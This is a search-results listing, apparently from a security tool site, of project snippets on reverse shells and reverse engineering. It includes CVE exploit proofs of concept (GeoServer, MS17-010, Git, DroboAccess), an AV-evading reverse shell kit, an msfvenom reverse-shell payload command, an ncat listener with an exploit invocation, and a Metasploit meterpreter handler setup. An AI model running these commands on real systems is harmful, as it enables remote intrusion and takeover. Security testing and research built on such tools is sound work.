8644 matches found
CVE-2024-36401
RCE for CVE-2024-36401 POC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets. Overview POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by phith0n. H...
MS17-010_CVE-2017-0143
MS17-010 🖥️ -h3x0v3rl0rd- ️⃣ CVE-2017-0143 Docker Using msfvenom to Generate a Payload: root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe -p windows/shellreversetcp: Specifies the payload a reverse TCP shell for Windows. LHOST=10.10.14.4: The...
replica
REPLICA ドラゴンを飼いならせ ✨機能 ⚡ 見逃された命令を逆アセンブル - Ghidraの自動解析が見逃したコードを定義 ⚡ 見逃された関数を検出・修正 - Ghidraの自動解析が見逃した関数を定義 ⚡ 'undefinedN'データ型の修正 - 'undefinedN'データ型を修正して逆アセンブルと逆コンパイルを強化 ⚡ MSDN API情報をコメントとして設定 - 関数、引数、戻り値の情報をコメントとしてGhidraの逆アセンブルリストに統合 ⚡ API呼び出しに基づく関数のタグ付け -...
replica
REPLICA TAME THE DRAGON ✨Features ⚡ Disassemble missed instructions - Define code that Ghidra's auto analysis missed ⚡ Detect and fix missed functions - Define functions that Ghidra's auto analysis missed ⚡ Fix 'undefinedN' datatypes - Enhance Disassembly and Decompilation by fixing 'undefinedN'...
CVE-2024-32002-Reverse-Shell
CVE-2024-32002-Reverse-Shell This script demonstrates how to exploit CVE-2024-32002 to obtain a reverse shell, providing remote access to the affected system. Use it with caution in controlled environments and only for educational or security testing purposes. Blog Post This script is inspired by...
Salsa-tools
root@kitploit: / / / / / / / / \ / / / / / / / / / / / / / / // / // / / / / // / // / //,///,/ // //// Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any...
radare2
Radare2: Unix ギークのためのリブレリバースエンジニアリングフレームワーク 現在の git master ブランチは 6.2.2 で、次のリリースは 6.2.4 になります。 説明 r2 は radare の完全な書き直しです。リバースエンジニアリングのタスクを容易にするためのライブラリ、ツール、プラグインのセットを提供します。LGPLv3 の下で配布されていますが、各プラグインは異なるライセンスを持つことができます(詳細は r2 -Lj を参照)。 radare...
CVE-2018-14699
CVE-2018-14699 UnAuth Command injection in the enableuser function of DroboAccess v2.1 Usage: To use First startup a listener ncat -nvlp 1337 Next run the exploit example: exploit.py -t 192.168.1.122:8080 -l 192.168.1.2 -p 1337 '-t', '--target', help='host for exploitation, ex...
hakrevdns
hakrevdns 小巧、快速、简单的工具,用于大规模执行反向 DNS 查询。 你向它输入 IP 地址,它返回主机名。 这是通过 IP 地址查找属于某公司的域名和子域名的一种有用方法。 安装 root@kitploit: go install github.com/hakluke/hakrevdns@latest 用法 最基本的用法是直接将 IP 地址列表通过管道传给该工具,例如: root@kitploit: hakluke$ prips 173.0.84.0/24 | hakrevdns 173.0.84.110 he.paypal.com. 173.0.84.109...
CVE-2026-34197-Apache-ActiveMQ-RCE
修复由于未对command进行xml转义导致的reverseshell失败的问题...
Exploiting-a-vulnerability-using-reverse-shell
Information Security Fundamentals — Spring 2026 Project Total Points: 20 | Deadline: No late submissions accepted Overview This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical pre-authentication RCE vulnerability CVE-2025-32433 in...
reverse-engineering
Reverse Engineering resources A curated list of awesome reversing resources Awesome Reversing Books Courses Practice Hex Editors Binary Format Disassemblers Binary Analysis Bytecode Analysis Import Reconstruction Dynamic Analysis Debugging Mac Decrypt Document Analysis Scripting Android Yara Book...
CVE-2025-24893-POC
CVE-2025-24893 Install bun: root@kitploit: curl -fsSL https://bun.com/install | bash To install dependencies: root@kitploit: bun install To run: root@kitploit: bun run CVE-2025-24893.ts This project was created using bun init in bun v1.2.19. Bun is a fast all-in-one JavaScript runtime. How to use...
CVE-2019-16759
CVE-2019-16759 vBulletin 5.x未授权RCE批量检测脚本 这漏洞挺鸡肋的,随便找了200多个,就5个存在这个洞 接下来自行解决,php都有了,还不会反弹shell?...
CVE-2019-17558_Solr_Vul_Tool
Solr Velocity Template Injection Vulnerability Detection Tool Tool Introduction At the end of October 2019, the Solr Velocity template injection remote command execution vulnerability was disclosed. Manual detection of this vulnerability requires several rounds of capturing and modifying packets...
httptoolkit
HTTP Toolkit...
mitmproxy2swagger
mitmproxy2swagger https://user-images.githubusercontent.com/5400940/168086818-c48f60ab-3f95-42eb-b435-c8b1a6326b81.mp4 mitmproxy のキャプチャを OpenAPI 3.0 仕様に自動変換するツールです。つまり、アプリを実行してトラフィックをキャプチャするだけで、REST API を自動的にリバースエンジニアリングできます。 🆕 新着! ブラウザ DevTools からエクスポートされた HAR の処理をサポートしました。詳細は 使用方法 - HAR...
Awesome-Android-Reverse-Engineering
Awesome Android Reverse Engineering A curated list of awesome Android Reverse Engineering training, resources, and tools. How to Use Awesome-Android-Reverse-Engineering is an amazing list for people who work in taking apart Android applications, systems, or components. Simply press ctrl + F to...
CVE-2024-36401-PoC
CVE-2024-36401-PoC CVE-2024-36401 GeoServer 的概念验证利用 GeoServer 的受影响版本为 2.23.6、2.24.4、2.25.2 之前的版本 !!! 仅供安全测试使用 !!! 除非您拥有明确许可,否则请勿在非您拥有的系统上使用此工具 !!! 运行方式... 1. 在 Metasploit 中启动一个监听器 root@kitploit: msf6 use exploit/multi/handler msf6 exploitmulti/handler set payload linux/x64/meterpreterreversetcp...